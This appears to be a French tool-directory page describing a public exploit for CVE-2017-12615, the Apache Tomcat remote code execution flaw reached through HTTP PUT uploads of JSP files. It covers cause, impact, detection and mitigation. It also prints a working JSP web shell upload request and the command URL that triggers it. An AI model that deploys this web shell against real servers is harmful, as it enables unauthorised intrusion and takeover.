Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2017-12615 — CVE-2017-12615 - Exécution de code à distance (RCE) Apache Tomcat | Kitploit
Outils/GitHubGitHub/k3ystr0k3r/cve-2017-12615
Génération de PayloadsAnalyse des VulnérabilitésAnalyse de CodeExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubk3ystr0k3r/cve-2017-12615

CVE-2017-12615

CVE-2017-12615 - Exécution de code à distance (RCE) Apache Tomcat

Voir le dépôt
1il y a 2 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2017-12615 - Exécution de code à distance (RCE) sur Apache Tomcat

CVE-2017-12615 est une vulnérabilité d'exécution de code à distance (RCE) affectant Apache Tomcat 7.0.0 à 7.0.79 fonctionnant sur Microsoft Windows lorsque les requêtes HTTP PUT sont activées.

La vulnérabilité existe car Tomcat gère incorrectement les fichiers JSP téléchargés lorsque le DefaultServlet est configuré avec le paramètre readonly défini sur false. Dans ces conditions, un attaquant non authentifié peut télécharger un fichier JSP malveillant directement sur le serveur web et exécuter du code Java arbitraire simplement en demandant le fichier téléchargé.

Cette vulnérabilité est devenue l'un des problèmes RCE Tomcat les plus connus en raison de la facilité avec laquelle elle pouvait être exploitée contre des serveurs mal configurés.


Versions concernées

  • Apache Tomcat 7.0.0 - 7.0.79
  • Installations Microsoft Windows
  • Méthode HTTP PUT activée
  • readonly="false" configuré sur le DefaultServlet

Gravité

MétriqueValeur
CVECVE-2017-12615
CVSS v38.1 (Élevée)
Vecteur d'attaqueRéseau
Privilèges requisAucun
Interaction utilisateurAucune
ImpactExécution de code à distance

Cause racine

Normalement, Apache Tomcat empêche les utilisateurs de télécharger des fichiers JSP exécutables.

Cependant, lorsque :

  • Les requêtes HTTP PUT sont activées
  • Le DefaultServlet est accessible en écriture (readonly=false)
  • Tomcat fonctionne sous Windows

un attaquant peut télécharger un fichier JSP directement dans la racine web.

Une fois téléchargé, la demande de ce JSP amène Tomcat à le compiler et à l'exécuter, permettant l'exécution de code Java arbitraire sous les privilèges du service Tomcat.


Flux d'attaque

root@kitploit:~
Attaquant
    │
    │ HTTP PUT
    ▼
Télécharge un shell JSP malveillant
    │
    ▼
Tomcat stocke le fichier
    │
    │ HTTP GET
    ▼
Demande le JSP téléchargé
    │
    ▼
Tomcat compile le JSP
    │
    ▼
Le code Java s'exécute
    │
    ▼
Exécution de code à distance

Processus d'exploitation

Une attaque typique suit ces étapes :

  1. Identifier une instance Tomcat vulnérable.
  2. Vérifier que les requêtes HTTP PUT sont autorisées.
  3. Télécharger un shell web .jsp malveillant.
  4. Demander le JSP téléchargé.
  5. Exécuter des commandes système arbitraires.
  6. Établir un reverse shell ou déployer des charges utiles supplémentaires.

Aucune authentification n'est requise si le serveur est vulnérable.


Exemple de requête

Exemple de requête HTTP PUT :

root@kitploit:~
PUT /shell.jsp HTTP/1.1
Host: victime.com
Content-Type: application/octet-stream

<%@ page import="java.io.*" %>
<%
Runtime.getRuntime().exec(request.getParameter("cmd"));
%>

Si elle réussit, le serveur répond avec :

root@kitploit:~
HTTP/1.1 201 Created

La charge utile peut ensuite être exécutée en visitant :

root@kitploit:~
http://victime.com/shell.jsp?cmd=whoami

Exemple de détection

Une façon simple d'identifier les systèmes vulnérables consiste à tenter de télécharger un JSP de test inoffensif :

root@kitploit:~
PUT /test.jsp

Les réponses possibles incluent :

root@kitploit:~
201 Created

ou

root@kitploit:~
204 No Content

Si le fichier téléchargé peut ensuite être récupéré via HTTP, le serveur est probablement vulnérable.


Impact

Une exploitation réussie permet à un attaquant de :

  • Exécuter des commandes système arbitraires
  • Télécharger des shells web persistants
  • Obtenir des reverse shells
  • Déployer des logiciels malveillants ou des ransomwares
  • Voler des informations sensibles
  • Pivoter plus profondément dans les réseaux internes
  • Compromettre entièrement le serveur Tomcat affecté

Indicateurs de compromission

Les équipes de sécurité doivent enquêter sur :

  • Les requêtes HTTP PUT inattendues
  • Les fichiers .jsp nouvellement créés
  • Les shells web inconnus
  • Les processus enfants suspects générés par Tomcat
  • Les connexions réseau reverse shell
  • Les activités inhabituelles dans la racine web de Tomcat

Atténuation

Les mesures d'atténuation recommandées incluent :

  • Mettre à niveau Apache Tomcat vers une version corrigée.
  • Désactiver HTTP PUT sauf si absolument nécessaire.
  • S'assurer que le DefaultServlet utilise readonly="true".
  • Restreindre les autorisations de téléchargement.
  • Surveiller la création inattendue de fichiers JSP.
  • Déployer un pare-feu d'application web (WAF).
  • Examiner régulièrement les journaux d'accès Tomcat pour détecter les requêtes PUT suspectes.

Résumé technique

PropriétéValeur
VulnérabilitéTéléchargement arbitraire de JSP
CWECWE-434 - Téléchargement sans restriction de fichier de type dangereux
Authentification requiseNon
Complexité de l'exploitFaible sur les configurations vulnérables
RésultatExécution de code à distance
PlateformeWindows
ServiceApache Tomcat

Références

  • Base de données nationale des vulnérabilités (NVD) du NIST
  • Avis de sécurité Apache Tomcat
  • Enregistrement CVE : CVE-2017-12615

Avertissement

Ce dépôt est destiné uniquement à des fins éducatives, de recherche en sécurité défensive et de tests d'intrusion autorisés. N'utilisez pas ces informations contre des systèmes sans autorisation explicite.

Télécharger l’outil